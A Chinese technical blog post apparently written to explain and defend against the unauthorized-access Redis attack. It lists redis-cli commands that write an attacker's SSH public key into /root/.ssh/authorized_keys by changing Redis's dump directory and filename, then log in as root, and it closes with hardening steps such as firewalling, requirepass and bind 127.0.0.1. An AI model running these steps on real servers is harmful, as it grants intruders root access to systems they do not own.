Redis- 如何防止攻击者利用未授权访问 Redis 服务的攻击获取目标机器的 root 权限

最新推荐文章于 2024-06-12 19:31:55 发布
最新推荐文章于 2024-06-12 19:31:55 发布
阅读量387 收藏 7
点赞数 4
分类专栏: Redis 文章标签: redis 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43844521/article/details/138904383
版权

攻击概述

以下攻击步骤展示了如何利用未加防护的 Redis 服务器,通过配置 Redis 的持久化机制,将攻击者的 SSH 公钥写入目标机器的 ~/.ssh/authorized_keys 文件,从而获取目标机器的 root 权限。这是一种典型的利用未授权访问 Redis 服务的攻击方法。

攻击步骤详细介绍

1. 准备攻击者的 SSH 公钥

首先,攻击者需要准备自己的 SSH 公钥:

cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

这段命令执行以下操作:

  • 进入攻击者的 ~/.ssh 目录。
  • 使用 echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n" 命令将 SSH 公钥文件 id_rsa.pub 的内容包裹在前后两个空行中,并重定向输出到 key.txt 文件。

加入前后两个空行是关键,因为这样可以确保 authorized_keys 文件的格式正确,不会破坏已有的条目。

2. 将 SSH 公钥写入 Redis

将准备好的 key.txt 文件的内容通过 redis-cli 命令写入 Redis 中的一个键:

cat key.txt | redis-cli -h xx.xx.xx.xx -x set key

这条命令执行以下操作:

  • 使用 cat key.txt 读取 key.txt 文件的内容。
  • 使用 redis-cli 命令将内容写入 Redis 键 key 中。-x 选项表示从标准输入读取数据。
3. 连接到目标 Redis 服务器

通过 redis-cli 连接到目标 Redis 服务器:

redis-cli -h xx.xx.xx.xx
4. 获取并修改 Redis 备份路径

获取目标 Redis 服务器的当前备份路径:

CONFIG GET dir

将 Redis 的备份路径设置为目标用户的 SSH 目录(这里假设是 root 用户的 ~/.ssh 目录):

CONFIG SET dir /root/.ssh
5. 设置备份文件的名称为 authorized_keys

将 Redis 的备份文件名设置为 authorized_keys

CONFIG SET dbfilename authorized_keys
6. 检查是否更改成功

检查 dbfilename 是否成功更改:

CONFIG GET dbfilename
7. 保存当前 Redis 数据库

使用 SAVE 命令将当前 Redis 数据库保存到磁盘。由于前面的配置更改,Redis 会将数据库保存到 /root/.ssh/authorized_keys 文件中:

SAVE
8. 通过 SSH 连接到目标机器

最后,通过 SSH 使用攻击者的私钥连接到目标机器的 root 用户:

ssh root@xx.xx.xx.xx

防御措施

为了防止类似攻击,建议采取以下防御措施:

  1. 限制 Redis 端口访问
    使用防火墙限制 Redis 端口的访问,只允许受信任的 IP 地址访问。

    sudo ufw allow from your_trusted_ip to any port 6379
sudo ufw enable

  2. 设置 Redis 访问密码
    在 Redis 配置文件 /etc/redis/redis.conf 中设置访问密码,以防止未授权访问。

    requirepass your_secure_password

    重启 Redis 服务:

    sudo systemctl restart redis

  3. 启用绑定 IP 地址
    确保 Redis 只绑定到本地 IP 地址或特定的受信任 IP 地址,而不是 0.0.0.0

    bind 127.0.0.1

  4. 定期检查 Redis 配置和数据
    定期检查 Redis 配置和数据目录,确保没有异常更改。

  5. 监控和报警
    设置监控和报警机制,及时发现和响应异常活动。

通过这些防御措施,可以显著提高 Redis 服务器的安全性,防止类似的攻击发生。

青衫客36
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用redis就可以获得root权限,怎么做的?
AnNanDu的博客
10-10 1711
我在云服务上安过两次redis,每次都被提示攻击他人。(我是好人怎么可能会干坏事呢) 所以我的服务器肯定被人入侵了,因为是个人服务器没什么重要东西端口是常年开放的也没有开启白名单防火墙,最重要的是密码都不设。怪不得天天被入侵,下面进行一下复现。
Centos Docker部署教程_docker部署centos
2401_84281655的博客
04-28 314
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
黑客攻防Redis拉锯战之Root提权_redis配置不当致使root被提权漏洞redis配置不当致使root被提权漏洞
2401_84253132的博客
04-30 581
奔溃这一次的安全事故只不过是在我们日常开发工程中的一些案例,而像“XSS”、“SQL注入”等等安全隐患都需要我们去注意。先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
redis 报错 Redis protected-mode 配置文件没有真正启动
Py.ziMing的博客
11-20 289
(error) DENIED Redis is running in protected mode because protected mode is enabled Redis protected-mode 是3.2 之后加入的新特性,在Redis.conf的注释中,我们可以了解到,他的具体作用和启用条件 链接redis 时只能通过本地localhost (127.0.0.1)这个来链接,而不...
默认 redis 安装存在漏洞, 可以直接 获取 root 权限
Terry - 专注外贸B2C
01-28 4832
转载地址:http://www.2cto.com/Article/201512/454117.html 我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。嗯,假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。 内网存在许多 redis 授权访问,为什么不问问神奇海螺呢? 详细说明: 我假装闲来
利用老版本 Redis 漏洞获取服务root 权限
顽石的专栏
12-26 6621
1. 背景介绍redis 服务默认情况下是配置密码的,如果所在服务器恰好开了外网则此时很容易借助 redis漏洞获取目标服务器的 root 权限。 yum 安装的 3.x 系列的 redis 一般默认开启了 protected 模式,此时只能从 127.0.0.1 连接操作 redis-server: 如果远程连接上,则不能进行操作: 如果用户从本地连上 redis-serve
Redis--弱口令授权访问漏洞
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
05-19 1万+
Redis中存在授权访问漏洞,该漏洞源于程序在默认配置下会绑定在6379端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务访问权限利用漏洞授权访问Redis并读取Redis的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。
Redis 授权访问的原理、危害及复现
新青年1号
01-03 1401
Redis 授权访问准确的来说,其实并不是一个漏洞。而是由于开发人员配置不当,而产生的预料之外的危害
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
redis++使用说明,windows下编译redis-plus-plus
06-13
redis++使用说明,windows下编译redis-plus-plus
redis-py-cluster:官方redis集群的Python集群客户端。 Redis 3.0+
04-28
redis-py-cluster 该客户端提供了Redis 3.0中添加的Redis集群客户端。 该项目是antirez的redis-rb-cluster的移植版,具有许多附加功能。 原始资源可以在找到 分支master将始终包含已从Pull Requests中合并的最新...
Spring Security实现用户认证四:使用JWT与Redis实现无状态认证
最新发布
不做菜虚困的博客
06-12 629
在基本的通信流程中,我们一般采用Session去存储用户的认证状态。在Spring Security实现用户认证三中讲过,在拿到前端传输过来的用户名和密码之后,会有专门的过滤器处理这部分的需求,并且对认证成功的用户生成Token且存储在Session中。在下次发起请求时,直接从Session中取出同用户名的token进行密码哈希的比较要认证用户。对于无状态认证,则我们的认证不依赖与服务器端存储的Session的状态。所以无状态认证需要我们每次从前端传输一个包含完整认证信息的Token到服务器端进行自定义的认
Redis进阶知识个人汇总
MADAO的博客
06-08 1248
一篇关于Redis持久化、主从架构、哨兵机制、分片集群、多级缓存、Redis最佳的键值设计、批处理优化、Redis底层的数据类型、Redis如何实现5种基本数据类型、Linux的5种网络模型以及IO多路复用在Redis网络模型中的应用、Redis的内存策略(包括过期key的处理和内存淘汰策略)。
使用redis构建简单的社交网站
youyouxiong的博客
06-08 358
这些命令只是Redis命令集的一小部分。Redis还提供了许多其他命令,用于处理更复杂的数据类型和操作,如位图、HyperLogLog、GEO等。在实践中,你应该根据你的应用需求选择合适的命令。记得在实际部署之前,先在测试环境中充分测试所有命令和操作。Redis命令实践通常涉及对Redis服务器的直接操作,包括数据的增删改查以及管理Redis实例。
026、工具_redis-server
细致-专业-实操
06-12 165
整个内存检测的时间比较长。通常无需每次开启Redis实例时都执行–test-memory选项,该功能更偏向 于调试和测试,例如,想快速占满机器内存做一些极端条件的测试,这个功 能是一个不错的选择。redis-server除了启动Redis外,还有一个 --test-memory选项。
基于redis的分布式锁
孟斌斌的博客
06-12 277
用脚本的方式执行redisTemplate.execute会出现异常java.lang.UnsupportedOperationException: io.lettuce.core.output.ValueOutput does not support set(long),好像是返回值无法转换,由于redis版本不匹配,我这边redis版本是5.0.14.1;释放锁时需要确保只有持有锁的客户端才能释放锁,因此需要在释放锁时检查锁的值是否是当前客户端的标识。4.3通过value比对保证解的锁是自己持有的;
SpringBoot Redis读写与数据序列化 RedisTemplate 与 StringRedisTemplate 防转字节
生产队的驴
06-06 459
RedisTemplate 对象在底层默认会转成字节,造成了内存的开销很大,这是他底层进行处理的,造成可读性差,如需要转成简单的字符串存储需要进行序列化的配置。
明明有redis-cli却bash: redis-cli:找到命令
09-12
您可能遇到了环境变量的问题,导致无法直接使用redis-cli命令。一个解决办法是使用redis-cli的全路径来执行命令。...这样,您就可以通过使用redis-cli的完整路径来执行命令,解决了bash: redis-cli: 找到命令的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫客36

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值